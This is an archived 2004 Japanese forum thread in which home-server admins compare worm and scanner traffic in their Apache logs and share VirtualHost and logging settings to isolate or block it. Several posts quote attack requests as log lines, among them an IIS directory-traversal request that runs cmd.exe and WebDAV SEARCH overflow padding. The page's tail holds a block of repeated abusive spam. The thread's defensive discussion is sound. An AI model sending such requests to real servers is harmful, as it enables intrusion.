  |_,|_,|_,|/⌒      (・ )  (・ )|
  |_,|_,|_人そ(^i    ⌒ ) ・・)'⌒ヽ
  | )   ヽノ |.   ┏━━━┓|
  |  `".`´  ノ   ┃ ノ ̄i ┃|
  人  入_ノ´   ┃ヽニニノ┃ノ\   ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの?
/  \_/\\   ┗━━┛/|\\
      /   \ ト ───イ/   ヽヽ
     /      ` ─┬─ イ     i i
    /          |      Y  |

256 :DNS未登録さん:04/02/10 05:16 ID:???
>>247
1500アタック/日?普通だよ、普通。
>>249
FW・フィルタ付きのルータを導入し、SYSLOGを見れ。

257 :DNS未登録さん:04/02/11 11:45 ID:???
最近、時々来る "GET /sumthin"が不気味だな。

200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-"


258 :DNS未登録さん:04/02/11 22:12 ID:???
>>257
それはサムスンの綴りを間違えたのです。



ってのは冗談で、
ググるとすこしはわかるかもしれませんよ。

259 :DNS未登録さん:04/02/12 17:00 ID:???
ワームじゃないんだけど
韓国からのアクセスが多い、
ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね
鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、
一時間に3回ぐらいの割合で入ってる
毎回違う串さして同一人物がやってるんだろうか…
他にログが無くてこればっかり並んでるから激しく怖い

260 :DNS未登録さん:04/02/14 20:26 ID:???
Windows98のIE5.5を詐称するならワーム
たしかWelchiaとかいう

261 :DNS未登録さん:04/03/12 15:12 ID:???
218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"

262 :DNS未登録さん:04/03/12 16:35 ID:???
219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"


263 :DNS未登録さん:04/03/13 03:37 ID:???
FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、
あれは単に割れ鯖をさがしてるクローラー?

264 :DNS未登録さん:04/03/22 21:24 ID:???
usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH
/\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1(ry

('-`).。oO(鬱陶しいことこの上ないのだが

265 :DNS未登録さん:04/03/31 12:01 ID:???
220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry
大量にキテル…しかも1リクエストに32Kbyteもある…

鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ

266 :DNS未登録さん:04/04/01 02:36 ID:???
ログを切り分けたいのですが上手くいかね。

SetEnvIf Request_URI "^/\\x90\\x02" worm nolog
SetEnvIf Request_URI "^/\x90\x02" worm nolog


アドバイスよろ。

267 :DNS未登録さん:04/04/01 04:08 ID:???
>>266
http://pc3.2ch.net/test/read.cgi/unix/1058797852/812-814
情報が分散するのは良くないよな

268 :DNS未登録さん:04/04/02 02:51 ID:???
>>267
ありがと,そっちのスレはチェックしてませんでした。

SetEnvIf じゃ分けれませんか(´・ω・`)ショボーン

269 :267:04/04/02 04:18 ID:???
>>268
なんとな〜くだけど、vhost使って分けられそうな気がしない?
大抵のウィルスはhostを名乗らないので、別けられそうな気がする

とか思いつつ、俺は放置してるわけだが

270 :267:04/04/02 05:36 ID:???
いい機会なんで試してみたが、分離は可能でした
結果だけ報告

271 :DNS未登録さん:04/04/02 19:16 ID:???
>>266
パイプ経由のロギングを利用するのはどうよ?

CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog

とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。

272 :DNS未登録さん:04/04/02 21:53 ID:???
267のリンク先の814だが。

Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、
<VirtualHost> で分離するのは当然有効。
ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。

あるいは、「異常なログを隔離する」ではなく、
CustomLog /dev/null common
CustomLog /path/to/access_log combined env=REMOTE_ADDR
のように、環境変数が正常にセットされているもののみ隔離するという方法でも
できそうだが、これはうまくいくかどうかは試していない。


273 :DNS未登録さん:04/04/03 03:17 ID:???
>>272
<VirtualHost>でhost名を知らないアクセス=ワームを分離する方法ですが、
これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。
わざわざ串を刺すのはちょっと…。

274 :267:04/04/03 04:13 ID:???
>>273
うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし
hosts に書くかDNS鯖に細工をすれば対処できませんか?

それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ

275 :DNS未登録さん:04/04/03 11:38 ID:???
272だが。
IP 直打ちでも Host: にその IP アドレスが入るので、
プライベートアドレスを ServerAlias に指定すればよし。

NameVirtualHost *
<VirtualHost *>
ServerName dummy.host
CustomLog [隔離ログ]
...
</VirtualHost>
<VirtualHost *>
ServerName xxx.yyy.zzz
ServerAlias localhost 127.0.0.1 192.168.0.1 ...
CustomLog [ほんとのログ]
...
</VirtualHost>

このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は
dummy.host の設定が使われる。

276 :273:04/04/03 15:51 ID:???
>>274-275

大変参考になりました。

で、>>261他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので
アクセスログの書式も

 \"%r\" → \"%m %!414U %H\"

として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、
ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。

277 :DNS未登録さん:04/04/04 02:33 ID:???
どうしよう。ログにクソクエリの跡が

278 :DNS未登録さん:04/04/05 22:05 ID:???
ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか?

279 :DNS未登録さん:04/04/06 10:08 ID:???
SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90 で来るヤツって
www のホスト名で来てませんか?

280 :DNS未登録さん:04/04/06 10:14 ID:???
>>278
/dev/zeroにしてください

281 :278:04/04/06 14:51 ID:???
>>276
レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった
特殊デバイスはApacheではアクセスできないようになっているみたいですね。
実験的にDocumentRootに設定してみましたが、エラーログには

[Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero

と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。
まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。

282 :DNS未登録さん:04/04/06 15:13 ID:???
いや、/dev/zeroはネタだろ…。

283 :DNS未登録さん:04/04/06 15:26 ID:???
/dev/shm

284 :DNS未登録さん:04/04/14 13:37 ID:???
保守

285 :sage:04/04/21 15:04 ID:2waT5kFU
誘導されてきました.
SEARCHとかのワーム攻撃を避けるために,
NGSecureWeb for Linux
http://canon-sol.jp/product/ng/index.html
とか
SRP(Secure Reverse Proxy)
http://www.gomibako.com/~umesan/srp/
とか使ってる人います?役に立ちますかね?

286 :DNS未登録さん:04/04/21 16:44 ID:???
>>285
個人で鯖立ててる分には>>260以降の対策で十分なので要らないな。
まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。

287 :DNS未登録さん:04/04/21 16:53 ID:???
>>286
ここは自宅鯖板

で、名前にsageを入れる意味は何なんだろう

288 :DNS未登録さん:04/04/30 21:40 ID:???
自宅で鯖っつか社長の趣味で意味無く鯖立てたとか

最近のウィルスによるアクセスはその人達が原因かな

289 :DNS未登録さん:04/05/04 23:15 ID:???
最近、ワーム多すぎ。ログがこればっかり。

290 :DNS未登録さん:04/05/04 23:26 ID:???
ど、どれだ??(汗

291 :DNS未登録さん:04/05/05 13:54 ID:???
ログなんか見てネーヨ

292 :DNS未登録さん:04/05/05 14:01 ID:???
http://www.microsoft.com/japan/security/incident/sasser.mspx
Sasser ワームについてのお知らせ

休み明けに注意

293 :DNS未登録さん:04/05/09 05:51 ID:???
WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。

294 :DNS未登録さん:04/06/19 01:01 ID:Jqdp5jls
緊急浮上

295 :DNS未登録さん:04/06/20 01:36 ID:???
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

296 :DNS未登録さん:04/06/21 23:58 ID:???
感染しているPCを持っているユーザーに通知してあげたい
HPがあってメルアド書いててくれたら一番、楽なんだけどね
Windowsのメッセージサービスだっけ? あれって日本語も通るんだっけ?

気づいてくれないかなぁ・・・
218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-"


297 :DNS未登録さん:04/06/22 00:08 ID:???
>>296
messengerサービスは日本語通るよ。

298 :DNS未登録さん:04/06/25 22:10 ID:???
ほらよ。

ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを
ログに保存しない。かつ、すべてのリクエストを拒否する。
おまけで、拒否した403エラーをerror_logにも残さない。

LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined

# Reject IP Adress Access
<VirtualHost XXX.XXX.XXX.XXX:80>
CustomLog logs/access_log attacked
ErrorLog /dev/null

<Directory ~ ".*">
Order deny,allow
Deny from all
</Directory>
</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>
ServerName www.example.com
DocumentRoot /usr/local/apache/htdocs
ServerAdmin webmaster@www.example.com
CustomLog logs/example_access_log extended combined
ErrorLog logs/example_error_log
</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>

</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>

</VirtualHost>


299 :DNS未登録さん:04/06/25 22:23 ID:44W99bib
ふふーん

300 :DNS未登録さん:04/07/09 04:36 ID:csRQH/jq
age

301 :DNS未登録さん:04/07/23 16:06 ID:???
218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC・・・

アクセスしてみたら中国のサイトみたいだけど・・・


302 :DNS未登録さん:04/07/23 20:38 ID:???
>>301
それアタックツールじゃない?
WinNTAutoAttackっていうやつ


303 :DNS未登録さん:04/07/23 22:23 ID:???
203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-"

最近、こういうのが来るようになったんですけど....

304 :DNS未登録さん:04/07/24 00:20 ID:vV4StFaU
>>303
うちにも来てますね。同じようなの。
メソッドがなくて、リクエスト文字列はバラバラ。
なんらかのワームと思われますけど、
共通の指紋がなくて検索に掛からずいまだ正体不明です。

305 :DNS未登録さん:04/07/24 20:41 ID:???
Googlebotってのが怖い・・・
誰か助けて。

306 :DNS未登録さん:04/07/24 20:48 ID:???
>>305
やべーよ、それに狙われたら終わりだよ。
個人情報全部抜かれてるよ、きっと。

307 :DNS未登録さん:04/07/24 21:54 ID:???
>>305
うちなんかあえてGooglebotが来やすいように対策して
相手をはめてやろうと頑張ってるんだけど全然こないよ



orz

308 :DNS未登録さん:04/07/25 09:02 ID:JgINXHak
>>307

もしかして、昔、嘘教えられた人?

Googlebotに来て欲しいなら、robots.txt に

User-Agent: *
Disallow: /

て、書いちゃダメだよ。

人違いならイイんだけど、昔、検索サイトに登録されたいのでロボットに
来て欲しいという人に対して、上記ファイルを書けばロボットが来てくれる
と嘘を教えた人が居たから。

今でも嘘を信じてロボットを待ってるとしたら可哀想で。。。

309 :DNS未登録さん:04/07/25 14:56 ID:???
>308
スレ違い。

# robots.txt を置いて検索蹴っていたとしても、ロボットが来なくなる
# わけじゃない。
# robots.txtは探すから。
#
# それすら来ない(accessログに残っていない)なら、、、
#
#
# まぁ、イ` とだけ言っておこう。



310 :DNS未登録さん:04/07/25 19:04 ID:OSa9+g6L
先方へのお知らせ用のテンプレートってないでしょうかか?

やられていると思われるサーバーから当方のサーバーに、
SSHで進入しようとしたログを見つけました。
国内のとある建築デザイン会社のネットワーク内からなんですが。
お知らせしてあげようかなと思うものの、
一からメール起こすのもなんだかなぁと。

311 :DNS未登録さん:04/08/01 23:30 ID:???
jedle.ms.mff.cuni.cz - - [31/Jul/2004:01:10:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)
dns.520net.to - - [31/Jul/2004:15:58:28 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)

こんなんもいっぱい来る…って、ワームじゃなくて故意か(^^;


312 :DNS未登録さん:04/08/04 20:29 ID:???
>>311
それつい先日うちにも来た

313 :DNS更新ミスさん:04/08/16 00:04 ID:Fr/JI0uA
Virtual Host の設定例ですよん。

NameVirtualHost *

## default (unknown) domain
<VirtualHost *>
ServerName localhost
DocumentRoot /web/unknown
ErrorLog "|bin\rotatelogs.exe logs/unknown/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/unknown/access_%Y%m%d.log 86400 540" common

HostnameLookups On

<Directory "/web/unknown">
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
</VirtualHost>

## abcdefg.com
<VirtualHost *>
ServerName abcdefg.com
DocumentRoot /web/abcdefg.com
ErrorLog "|bin\rotatelogs.exe logs/abcdefg.com/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/abcdefg.com/access_%Y%m%d.log 86400 540" common
<Directory "/web/abcdefg.com">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>

## vwxyx.info
<VirtualHost *>
ServerName vwxyx.info
DocumentRoot /web/vwxyx.info
ErrorLog "|bin\rotatelogs.exe logs/vwxyx.info/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/vwxyx.info/access_%Y%m%d.log 86400 540" common
<Directory "/web/vwxyx.info">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>

一個目の設定は二個目三個目の設定に合致しなかったときに評価されるので自然と IP 直打ちによるアクセスと判断可能。
そして、IP 直打ちは access deny に設定する。
web/unknown 自体も作成しない。

あとね、ログを取らないってのはやめたほうがいいと思う。
ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。


314 :DNS未登録さん:04/08/16 00:11 ID:???
/web/unknownをdenyにすると、ワームのアクセスがあるたびに
エラーログに client denied by server configuration: /web/unknown が残ってウザくないか?


315 :DNS未登録さん:04/08/16 00:29 ID:???
それがなぜかですね、
request failed: URI too long
としか書かれてない。


316 :DNS未登録さん:04/08/16 01:22 ID:???
>>313
> あとね、ログを取らないってのはやめたほうがいいと思う。
> ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。
言ってる事はもっともだ
でも、最近普通のlogすらチェックしてる時間無くて…

317 :DNS未登録さん:04/08/16 02:00 ID:???
とりあえず、ありもしないページを要求してきたら、そのIP近辺はまとめてアクセス規制かけるようにしてる。


318 :DNS未登録さん:04/08/16 02:07 ID:???
っつーかこのスレ来るような奴は基本的に分かってない。

319 :DNS未登録さん:04/08/16 02:15 ID:???
>>318
ごめんなさい

320 :DNS未登録さん:04/08/23 20:30 ID:LGQaz3lx
OCNってろくに対応しないんでしたっけ?

321 :DNS未登録さん:04/08/26 20:39 ID:02qpB0nV
219.157.121.142
こんなのが・・・・・

322 :DNS未登録さん:04/08/28 10:51 ID:???
219.154.151.29
219.154.8.152
219.154.151.29
YahooBB219037248174.bbtec.net

323 :DNS未登録さん:05/02/06 01:52:04 ID:???
記念かきこんぶ
221.137.138.141
221.14.244.126

106 KB
■ このスレッドは過去ログ倉庫に格納されています

2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 -
ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね
売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね
売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね
売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね売上厨死ね t;7
>>8>>9
>>1>>2>>3>>4>>5>>6★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)